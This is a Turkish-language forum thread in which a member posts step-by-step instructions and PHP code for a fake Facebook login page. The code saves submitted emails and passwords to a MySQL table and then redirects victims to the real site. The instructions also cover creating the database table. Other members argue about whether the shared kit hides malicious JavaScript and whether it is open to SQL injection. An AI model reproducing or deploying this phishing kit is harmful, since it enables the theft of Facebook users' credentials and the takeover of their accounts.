Facebook Fake Php&Mysql
-
SnipeTR bunu yazdı:
-----------------------------Cosmic bunu yazdı:
-----------------------------bakıyorum hemen
edit : php kısmında herhangi bir zarar verebilicek kod bulunmamakta aşağıda kısımda şifrelenmiş javascriptler var ama onlarında facebooka ait olduğu düşüncesindeyim. ayrıca post atılan veriler süzülmemiş sql injection yeme olasılığı yüksek hostta magic gpc kapalıysa
-----------------------------Biz kendi sistemlerimizde java scrptleri şifreleyip, jquery nin içine oraya buraya sokuyoruz,
Bu kadar emin olma hemen :))He vardır demiyorum ama yokturda demiyorum ilk kurban sizde olabilirsiniz :))
java script packer http://dean.edwards.name/packer/ ile şifreleyip jquery nin arasına soktuğum şeylerde var yok değil :))
neyse :)) ayrıca java scriptlerin arasına oto beğenme koyan birisini de tanıyorum hemde çok yakından :))
-----------------------------@SniperTR dediğim gibi isteyen kullanır isteyen kullanmaz. Kimseye bişey ıspatlayacak halim yok kodlar da içerisinde javascriptleri şifreliyorsan kırıldıklarını da biliyorsundur değil mi?Kır ozaman kendin bak nedir ne değildir. Yada facenin kaynak kodlarını al ve birebir karşılaştırma yap...
-
hocam ikidir diyosun isteyen kullanır isteyen kullanmaz diye. tamam isteyen kullansın kullanmasına da, inceleyip fikir beyan edenlere niye atarlanıyon ? tabi incelicez de diğer müritlerle paylaşcaz da.
-
@snipertr ben birşeyi söylüyorsam emin olabilirsin. sizin packliyceğiniz js leri anlamam 2 dakikamı almaz ;)
@emuman sadece fake yiycek adama linki vermiycek olabilirsin. ayrıca alttada yazmışsın baltalıyorlar falan filan diye baltalıycak olsam bu şekilde yaklaşmazdım konuya. millet güvenememiş o yüzden bakıp yorum yazdım. kişisel olarak algılama bu kısmı login sayın az nice eski hesaplar hacklenip millete trojan vs vs yedirilmeye çalışıldı burada o bakımdan inceliyim baktım. ha şimdi eğer dersen ki php ile trojan ne alaka. olurda adam hali hazırdaki hostunda dener test ederde db şifreleri falan başka birilerine post edilmesin diye baktım -
Dosyadan hala şüphe duyanlar için adım adım:
İlk olarak facebook.com a girin kaynak kodlarını alın. Kaynak kodları notepad++ programına yapıştırın içerisinde aratın:
Bulduğunuz kodun en üstüne yapıştırın:
<?php
/* Yazan Çizen Emuman */
$dbhost= "localhost";
$dbkullanici = "kullanici_adi";
$dbsifre = "sifre";
$dbadi = "veritabani_adi";
$baglan = @mysql_connect($dbhost,$dbkullanici,$dbsifre) or die("Mysql Bağlantısı Başarısız!");
$vt_sec = @mysql_select_db($dbadi,$baglan) or die ("Veritabanına Bağlanılamıyor!");
if($_POST){
$email = strip_tags(addslashes($_POST['email']));
$pass = strip_tags(addslashes($_POST['pass']));
$kaydet= mysql_query("INSERT INTO hesaplar (kullanici_adi,sifre) VALUES ('$email','$pass')");
if($kaydet){
header("Refresh:1; Url=http://www.facebook.com");
}else{
header("Refresh:1; Url=http://www.facebook.com");
}
}else{
?>
Tekrar kaynak kodlarda arama yapın:
</body></html>
Bulduğunuz satırın altına yapıştırın:
}
?>
Son olarak üstteki kodlama sekmesinden utf8 olarak dönüştür diyip kaydedin.
Sıra geldi veritabanına...
Veritabanı için phpmyadmine bağlanın ilk önce bir veritabanı oluşturun (utf8_general_ci) daha sonra ise hesaplar isminde bir tablo oluşturun:
Tablo 3 alandan oluşacak: 1. Alan: id (primary key ve auto increment) 2. Alan: kullanici_adi (varchar 255) 3. Alan: sifre (varchar 255)
NOT: Ha o şüpheci yorum yapan arkadaşlar şunu da unutmasınlar ya face kaynak kodlarında zararlı kod varsa o hergün girip saatlerinizi geçirdiğiniz facede? Belki de karşı kaldırıma geçerken araba da çarpabilir belli mi olur? Yapılan bazı yorumlara bu kadar sinirlenmemin sebebine gelelim "zararlı kod olabilir,hacklenirsiniz,ben javascripte neler gömdüm neler... vb..." acaba kaç kişi girip kodları inceledi yada kim içinde bişey buldu?Tabi ki sizde haklısınız kimse kimseye güvenmek zorunda da değil. Tartışmalar bu yönde devam ederse site yönetiminden başlığı silmelerini rica ederim olur biter...
-
Emuman bunu yazdı:
-----------------------------NOT: Ha o şüpheci yorum yapan arkadaşlar şunu da unutmasınlar ya face kaynak kodlarında zararlı kod varsa o hergün girip saatlerinizi geçirdiğiniz facede? Belki de karşı kaldırıma geçerken araba da çarpabilir belli mi olur? Yapılan bazı yorumlara bu kadar sinirlenmemin sebebine gelelim "zararlı kod olabilir,hacklenirsiniz,ben javascripte neler gömdüm neler... vb..." acaba kaç kişi girip kodları inceledi yada kim içinde bişey buldu?Tabi ki sizde haklısınız kimse kimseye güvenmek zorunda da değil. Tartışmalar bu yönde devam ederse site yönetiminden başlığı silmelerini rica ederim olur biter...
-----------------------------
kendinde diyorsun kimse kimseye güvenmek zorunda değil diye güvenemeyenler olmuş onların için bakıp söyledik temiz diye neden kişisele döküyorsun olayı? 1 satır kod ile adamın hostunda at koşturulabiliceğini sende çok iyi biliyorsundur o yüzden bu kadar uzatmanın lüzumu yok
-
Cosmic bunu yazdı:
-----------------------------Emuman bunu yazdı:
-----------------------------NOT: Ha o şüpheci yorum yapan arkadaşlar şunu da unutmasınlar ya face kaynak kodlarında zararlı kod varsa o hergün girip saatlerinizi geçirdiğiniz facede? Belki de karşı kaldırıma geçerken araba da çarpabilir belli mi olur? Yapılan bazı yorumlara bu kadar sinirlenmemin sebebine gelelim "zararlı kod olabilir,hacklenirsiniz,ben javascripte neler gömdüm neler... vb..." acaba kaç kişi girip kodları inceledi yada kim içinde bişey buldu?Tabi ki sizde haklısınız kimse kimseye güvenmek zorunda da değil. Tartışmalar bu yönde devam ederse site yönetiminden başlığı silmelerini rica ederim olur biter...
-----------------------------
kendinde diyorsun kimse kimseye güvenmek zorunda değil diye güvenemeyenler olmuş onların için bakıp söyledik temiz diye neden kişisele döküyorsun olayı? 1 satır kod ile adamın hostunda at koşturulabiliceğini sende çok iyi biliyorsundur o yüzden bu kadar uzatmanın lüzumu yok
-----------------------------Evet dediğin doğru 1 satır kodla çok şeyler yapılabilir.Bende uzatmak istemediğim için tuttum nasıl hazırlanacağını yazdım. Kaçtane aynı mesaj adamlar temiz diyor (sana lafım yok) halen kalkmış yok böyle şöyle diyenler oluyor.Beni burada kimse tanımaz doğrudur aktif değilim o da doğrudur. Ama söylediklerini ıspat edebilen varsa açık açık desinki kodda burada trojan var şurada backdoor var bende eyvallah diyeyim! Kusura bakmasınlar ama kimsenin kuru iftirasına pabuç bırakmam. Kimsenin kimseyi karalamaya da hakkı yok kodu inceleyip etmeden. Bu konuda da haklıyım kim ne derse desin. Sonuna kadar da savunurum kendimi. Bi baksana kaç kişi teşekkür etmiş peki?Konu 1273 kere okunmuş kaç kişinin emeğe saygısı var? Kim olsa sinirlenmez?
-
Emuman bunu yazdı:
-----------------------------Evet dediğin doğru 1 satır kodla çok şeyler yapılabilir.Bende uzatmak istemediğim için tuttum nasıl hazırlanacağını yazdım. Kaçtane aynı mesaj adamlar temiz diyor (sana lafım yok) halen kalkmış yok böyle şöyle diyenler oluyor.Beni burada kimse tanımaz doğrudur aktif değilim o da doğrudur. Ama söylediklerini ıspat edebilen varsa açık açık desinki kodda burada trojan var şurada backdoor var bende eyvallah diyeyim! Kusura bakmasınlar ama kimsenin kuru iftirasına pabuç bırakmam. Kimsenin kimseyi karalamaya da hakkı yok kodu inceleyip etmeden. Bu konuda da haklıyım kim ne derse desin. Sonuna kadar da savunurum kendimi. Bi baksana kaç kişi teşekkür etmiş peki?Konu 1273 kere okunmuş kaç kişinin emeğe saygısı var? Kim olsa sinirlenmez?
-----------------------------mesajlara tekrardan baktım ama kimse zararlı kod var falan dememiş olabilir demiş birileri incelesin demişler. eğer öyle diyen biri olsaydı hak verirdim sana
-
Cosmic bunu yazdı:
-----------------------------Emuman bunu yazdı:
-----------------------------Evet dediğin doğru 1 satır kodla çok şeyler yapılabilir.Bende uzatmak istemediğim için tuttum nasıl hazırlanacağını yazdım. Kaçtane aynı mesaj adamlar temiz diyor (sana lafım yok) halen kalkmış yok böyle şöyle diyenler oluyor.Beni burada kimse tanımaz doğrudur aktif değilim o da doğrudur. Ama söylediklerini ıspat edebilen varsa açık açık desinki kodda burada trojan var şurada backdoor var bende eyvallah diyeyim! Kusura bakmasınlar ama kimsenin kuru iftirasına pabuç bırakmam. Kimsenin kimseyi karalamaya da hakkı yok kodu inceleyip etmeden. Bu konuda da haklıyım kim ne derse desin. Sonuna kadar da savunurum kendimi. Bi baksana kaç kişi teşekkür etmiş peki?Konu 1273 kere okunmuş kaç kişinin emeğe saygısı var? Kim olsa sinirlenmez?
-----------------------------mesajlara tekrardan baktım ama kimse zararlı kod var falan dememiş olabilir demiş birileri incelesin demişler. eğer öyle diyen biri olsaydı hak verirdim sana
-----------------------------İlginç, ayıp değil mi?, He vardır demiyorum ama yokturda demiyorum vb... bunlar hangi kapıya çıkıyor?
Mesajları okuduğuna emin misin hocam?
-
Emuman bunu yazdı:
-----------------------------İlginç, ayıp değil mi?, He vardır demiyorum ama yokturda demiyorum vb... bunlar hangi kapıya çıkıyor?
Mesajları okuduğuna emin misin hocam?
-----------------------------
login sayısı az olupta satılan çok üyelik çıkıyor hocam. az aktif olduğun için o dikkat çekti. yani konun başka birşeyle ilgili olsaydı yine göze batıcaktı.o ayıp değil miyi facebook hesap çalma muabbeti için söylediğini düşünüyorum.
vardır demiyorum ama yokturda demiyorum" da incelememiş sadece yapılabilecek birşey olduğu söylemiş (Sana karşı birşey söylememiş yani) -
Eyvallah hocam twitter ile ilgilide birkaç bişey karalamıştım paylaşacaktım ama şevkim kaçtı bu konuda burada kapansın rica ediyorum. Teşekkür edenden de etmeyenden de Allah razı olsun ne diyeyim...